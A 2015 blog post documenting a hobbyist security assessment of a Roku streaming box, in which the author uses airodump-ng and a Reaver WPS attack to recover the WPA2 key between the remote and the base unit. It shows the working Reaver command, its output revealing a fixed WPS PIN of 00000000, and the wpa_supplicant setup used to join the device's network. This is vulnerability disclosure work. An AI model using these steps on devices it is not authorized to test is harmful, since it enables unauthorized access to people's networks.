07/26/2015

Cracking the ROKU V2 WPA2-PSK So my weekend ended up being somewhat of a Roku vulnerability assessment project. Starting with remotely sending API requests to navigate through Roku menu’s from a bash shell to issue a reboot or factory-reset, adding channels, etc.. to ultimately leading to cracking the WPA2-PSK key between the Roku “Wifi-Direct” remote control and the Roku base-station. My thought process was that if I can crack the WPA2-PSK, and connect to the Roku SSID, that this could be potentially exploited in a wardrive type of scenario leading to abusing others’ internet connections (through their Roku’s), depending on how they’re set up. The ability to connect to a users’ Roku SSID could also lead to compromise of the internal network the Roku is sitting on. The first thing I looked into was the “remote pairing” function. I wondered whether the PSK was passed along during the pairing process. That didn’t happen. No EAPOL’s were transmitted during the “Remote pairing” phase. What i did find, was that the EAPOL handshake occurred after a reboot of the Roku. Once the Roku unit is rebooted, the remote control passes the WPA2-PSK to the “base-station” for authentication. This is what allows communication between the remote and the Roku. The remote is the “station”, and the Roku unit is the WAP. The remote and station setup up their own Wi-Fi network for communication. It looks like the process Roku uses for this connectivity between the remote and the “base-station”, is “Wifi-Direct“, similar to a standard ad-hoc WiFi mode. So, firing up airodump-ng caught the handshake pretty quickly (within 4 minutes) upon reboot of the unit: First, i ran aircrack-ng with a password list I’ve compiled over time against the captured EAPOL’s with no luck. I also created a custom dictionary (Company name, Serial Number variations, Roku MAC Addresses, etc..), added it to my existing wordlist, and ran a crack using John the Ripper with the “–rules” option enabled on a GPU-based password cracking machine with 4 GPU’s in it. No luck there either. Seeing as how I probably wasn’t going to crack the PSK using either of those methods due to probably an extremely complex PSK scheme (i’d hope), i had to find another way. My thought was maybe they’re using a WPS-type setup in connecting the remote control to the unit. This turned out to be true: iw wlan0 scan output: WPS: * Version: 1.0

* Wi-Fi Protected Setup State: 2 (Configured)

* Response Type: 3 (AP)

* UUID: 22210203-0405-0607-0809-xxxxxxxxxxxxxx

* Manufacturer: Broadcom

* Model: SoftAP

* Model Number: 0

* Serial Number: 0

* Primary Device Type: 6-0050f204-1

* Device name: DIRECT-roku-ABE915

* Config methods: Display, Keypad

* RF Bands: 0x1

* Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20 I immediately fired up our good friend Reaver and gave it a go. After trying a number of arguments and getting nothing but fails: [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred This one did the trick (in 5 seconds): reaver -i wlan0mon -b DC:3A:5E:XX:XX:XX -c 9 -vv -w -a -S -N //cut....//

[P] AuthKey: 2c:93:b1:24:0d:6f:d3:0e:b0:78:e8:49:03:ac:87:1b:5a:d7:2d:7f:a0:77:7e:86:dc: 98:01:0d:15:15:9b:72

[+] Sending M2 message

[+] Received M1 message

[P] E-Hash1: bb:45:5d:4b:4f:70:4e:e5:28:61:52:ed:4b:5e:4e:0c:c5:7a:30:b5:81:90:5c:8a:f1:4e: 90:9b:14:3a:fc:48

[P] E-Hash2: d8:b4:94:9c:8d:37:95:a0:b0:a0:86:83:eb:70:d4:43:13:b4:b9:c1:a2:bf:a0:4a:f1:80: 77:0c:a6:9f:f9:00

[+] Received M3 message

[+] Sending M4 message

[+] Received M3 message

[+] Received M5 message

[+] Sending M6 message

[+] Received M7 message

[+] Sending WSC NACK

[+] Sending WSC NACK

[+] Pin cracked in 5 seconds

[+] WPS PIN: '00000000'

[+] WPA PSK: '25A36FBDC7A776EC9D6D09AB5B038507EE43D594B1791EA5xxxxxxxxxxxxxxxx'

[+] AP SSID: 'DIRECT-roku-ABE915' So…it looks like Roku is using a WPS PIN of “00000000” (bad, in general) for the connection between the remote and the unit, and we’ve also cracked the WPA2-PSK. Even with the PSK being insanely long, the weak WPS PIN or even WPS implementation, in general, cancels out the strength of the PSK. Having now obtained the pre-shared key that authenticates the remote control to the base-station, it was a pretty simple task associating with the Roku from a linux-based wireless client using a wpa_supplicant configuration in addition to a static wlan0 IP config in /etc/network/interfaces: wpa_supplicant.conf: ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev

update_config=1 network={

ssid="DIRECT-roku-ABE195"

proto=RSN

key_mgmt=WPA-PSK

pairwise=CCMP

group=CCMP

psk=97A36DBDC7A726EC9D6D09AB5B038507EE43D594B179xxxxxxxxxxxxxxxxxx

} $sudo ifup wlan0 /var/log/daemon.log: wlan0: Trying to associate with dc:3a:5e:xx:xx:xx (SSID='DIRECT-roku-ABE915' freq=2452 MHz)

wlan0: Associated with dc:3a:5e:xx:xx:xx

wlan0: WPA: Key negotiation completed with dc:3a:5e:xx:xx:xx [PTK=CCMP GTK=CCMP]

wlan0: CTRL-EVENT-CONNECTED - Connection to dc:3a:5e:xx:xx:xx completed (auth) [id=0 id_str=] And although wireless association with the Roku from a third-party wireless client was successful, due to the nature of the connection between the remote control and the base station being an “ad-hoc” type of “enclosed” wireless network, I have yet to be able to successfully pass-thru to the home wireless network, which provides the internet access for the Roku itself. Things I’ve tried already with no success:



- Spoofing the MAC address of the remote control.



- Spoofing the MAC address(es) of the Roku. (It has three?)



- Enabling “Developer Mode” and setting up debug on the Roku and using its tcpdump functionality (http://roku_ip/pkgs) to try and ascertain the IP addressing scheme of the ad-hoc network. Maybe catch some ARPS…no luck.



- Using the Roku as the gateway device.



- Using my usual WAP as the gateway device as a last resort. At the end of the day, it was still interesting to crack the PSK and WPS PIN. If anyone has any thoughts or suggestions on escalating this flaw (or absense of a secure PIN) to getting internet connectivity through the Roku, don’t hesitate to drop a line. Take-aways: 1. Roku WPA2-PSK cracked due to weak WPS PIN

2. Roku WPS Pin is 00000000

3. Just because you decide to use an impossible-to-surmise WPA2-PSK pass-phrase, implementing it through WPS is useless.

